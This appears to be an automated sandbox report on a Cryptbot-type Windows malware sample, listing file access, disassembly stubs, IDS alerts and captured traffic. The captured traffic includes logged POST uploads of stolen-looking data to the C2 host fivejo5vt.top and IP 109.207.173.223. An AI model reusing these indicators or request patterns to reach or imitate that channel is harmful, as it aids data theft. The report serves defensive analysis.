Source: oRu3cWBChq.exe |
ReversingLabs: Detection: 31% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 9_2_001C15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
9_2_001C15B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 9_2_6C2C14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
9_2_6C2C14B0 |
Source: oRu3cWBChq.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED |
Source: oRu3cWBChq.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\oRu3cWBChq.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\Desktop\oRu3cWBChq.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\oRu3cWBChq.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\oRu3cWBChq.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\Desktop\oRu3cWBChq.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\oRu3cWBChq.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
9_2_001C81E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C33AC70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C33AD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C33AD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
9_2_6C362EF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C2DAF80 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C39F960h |
9_2_6C2DE8C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C2EE490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C2EE490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
9_2_6C3604E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C2E04F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C2E0610 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C2EA720 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C2EA790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C2EA790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C2E0010 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6C39D014h] |
9_2_6C394110 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C2E4203 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
9_2_6C368250 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6C2EC2C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C2EA330 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C2EA3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6C2EA3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C33BDF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C33BF50 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
9_2_6C319F90 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C319910 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C379900 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C2FB98B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C2FB987 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C33BAC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6C337AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
9_2_6C2ED424 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6C39DFF4h |
9_2_6C333440 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
9_2_6C2ED5A4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
9_2_6C3335F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
9_2_6C2ED724 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C2ED050 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
9_2_6C357100 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6C2ED2B4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6C33B280 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
9_2_6C3393B0 |
Source: chrome.exe |
Memory has grown: Private usage: 8MB later: 26MB |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49732 -> 109.207.173.223:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49750 -> 109.207.173.223:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49736 -> 109.207.173.223:80 |
Source: global traffic |
HTTP traffic detected: GET /zViguzTHOAJchzMFSLOa1730123672 HTTP/1.1Host: home.fivejo5vt.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivejo5vt.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------012RLy9xjRP7di5VtTEwQgData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 31 32 52 4c 79 39 78 6a 52 50 37 64 69 35 56 74 54 45 77 51 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 61 71 69 6c 6f 71 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a c5 80 20 5b 1e c6 f7 2c bb e8 c6 e4 a4 e2 9f 6a 55 2a 5a b2 aa bd 0c b9 68 5a 6d 9c d5 b6 36 7f 42 56 9c cb c5 1a 19 61 c6 b1 b2 b2 09 2f 17 5b 7d 97 e2 a6 c2 d9 98 11 9b b7 17 11 8a c4 ce ce 91 c7 89 e5 4d 3a db 08 95 6b 0d 60 27 26 39 8b 51 e1 47 ab 01 96 d8 5e fd 9c d5 83 44 38 6f 35 c9 80 46 bd 5c f5 ad 8b a1 27 89 86 32 ec a2 f2 fd 4a 96 a3 12 bb 29 df 4b 0a 5b 26 12 45 80 e5 80 57 3b 13 97 7f 7c 94 1d 1f 43 ac 92 56 3f 23 14 29 de 2c af 9a d4 53 d9 e2 aa 2f 92 c9 6d 30 45 4f 04 de db b6 ac cc b4 8a 5b a8 0a 5a 0e 02 1b bb e4 fa 69 87 6c 15 a9 4f 82 c0 11 36 dc e0 5c 66 43 53 34 00 fc 92 ed 40 c0 15 32 a1 77 2f 78 d2 0e 03 f6 2d ba f5 2e 7a dc 92 57 1f c3 e6 cd 98 10 c4 69 85 54 a5 84 fe 4e 08 7e 71 3c 01 c7 e4 f5 a0 12 8b a2 61 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 31 32 52 4c 79 39 78 6a 52 50 37 64 69 35 56 74 54 45 77 51 67 2d 2d 0d 0a Data Ascii: --------------------------012RLy9xjRP7di5VtTEwQgContent-Disposition: form-data; name="file"; filename="Kaqiloqa.bin"Content-Type: application/octet-stream [,jU*ZhZm6BVa/[}M:k`'&9QG^D8o5F\'2J)K[&EW;|CV?#),S/m0EO[ZilO6\fCS4@2w/x-.zWiTN~q<a--------------------------012RLy9xjRP7di5VtTEwQg-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivejo5vt.topAccept: */*Content-Length: 77208Content-Type: multipart/form-data; boundary=------------------------47uGIbpVUH6h3fvZGHd8k3Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 37 75 47 49 62 70 56 55 48 36 68 33 66 76 5a 47 48 64 38 6b 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 73 75 79 65 7a 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 07 54 eb 32 87 46 69 cf 29 0e a3 24 76 a0 17 13 28 38 e2 27 30 39 f6 18 f6 a1 6c 74 05 c6 73 81 bf 04 93 92 72 24 70 67 ae 55 c3 41 af 03 8c 6e 51 67 6c 9e 53 c2 ea 7f 5b a0 2b 88 c8 e7 c3 e4 96 a3 51 24 48 ad f8 51 3e f4 24 a0 8f c0 be 37 b9 2e 26 63 b7 2f 13 ee 41 06 15 9f 16 d3 0b 34 27 58 a7 96 6d df 9c a8 fe 9a 8b c4 59 74 72 2e ef cf 8b 4e 64 85 8e 52 ec cf 8a 6d 10 52 92 fe 8f 38 fc a1 2a 04 b5 af 9c cf fa 0c 39 95 7d 10 25 f1 22 f4 51 4b 13 ec d7 3f 37 4e 58 6e 25 26 97 46 e5 14 79 80 d3 0c 5a 38 46 be 09 ef d5 07 52 80 df a9 2f f3 66 cb 1a a9 45 ac 1c b9 4d 46 5e 12 a5 69 31 e3 1f 5b f9 82 8d b1 d3 de c9 ae 8c ed e3 c1 0d 98 59 4e 18 af 06 34 5b b1 30 bd a8 f7 5b 83 33 68 12 e7 c9 f1 08 c6 fe 36 55 48 8d df 3e 7d 28 c9 4e e4 06 b6 45 b6 c4 21 73 eb a9 72 dc 99 04 9e 7d 8b cc fd 57 7f e3 5c d3 9e 40 8f 32 9a 42 af 1a 52 63 82 cc 5c 98 38 15 f7 f2 9d 77 d2 5e ff 84 d2 c1 a5 78 f2 71 17 6b 0f e9 33 3d d4 95 b2 cd 20 94 f4 a7 17 fa e2 c7 61 6f 25 b4 90 5c 80 3a 2a 13 46 1b ef bf 95 01 30 9c 47 ca cb 4d 2a db 5a 33 4c 06 0c 62 6f dd 4d a4 d4 5e 83 38 8e fc 88 00 83 bf 9b 7f e9 54 e9 04 5e 81 55 c9 cc 59 53 8b 42 f1 6b 9d 7d c4 b3 e4 ff e6 f9 98 aa 2b 37 80 e5 e5 14 a1 37 64 d9 31 77 df 4d a4 c0 4c c8 f9 e6 44 53 38 21 e3 ae bc 09 13 0b 2d 77 bd 4e 06 2a a2 1c f2 93 c7 b8 7c 4b 47 53 99 4e 01 25 5d 32 93 ec 5a 73 dc ca 5d 0a a7 d5 e2 33 87 a7 11 3e 8b 33 36 fc 9e ee 66 ed 85 68 eb 7a 51 b6 f3 03 1f 7e 16 93 41 20 9e 82 b4 bd 40 da d5 12 ab b1 2b 15 1e 11 59 a0 7c e6 33 2c ec ed dc fa a0 a0 43 ce d1 86 e0 e8 cd f3 3d 7c 97 b5 b0 8f df 7b 74 64 bb 6f 3c 9e 47 a8 39 12 f5 e5 50 c3 a1 46 04 c7 5a fa e5 0f 5f 32 2f 2e f4 b1 07 fc dc fd bf f5 c8 d2 c5 d1 4c fc c0 1c c6 46 fb ff 86 8a c3 e3 1a 94 5d bd 61 95 0e 00 e5 9c da 41 4a fa 42 e7 25 82 26 bf c7 58 39 |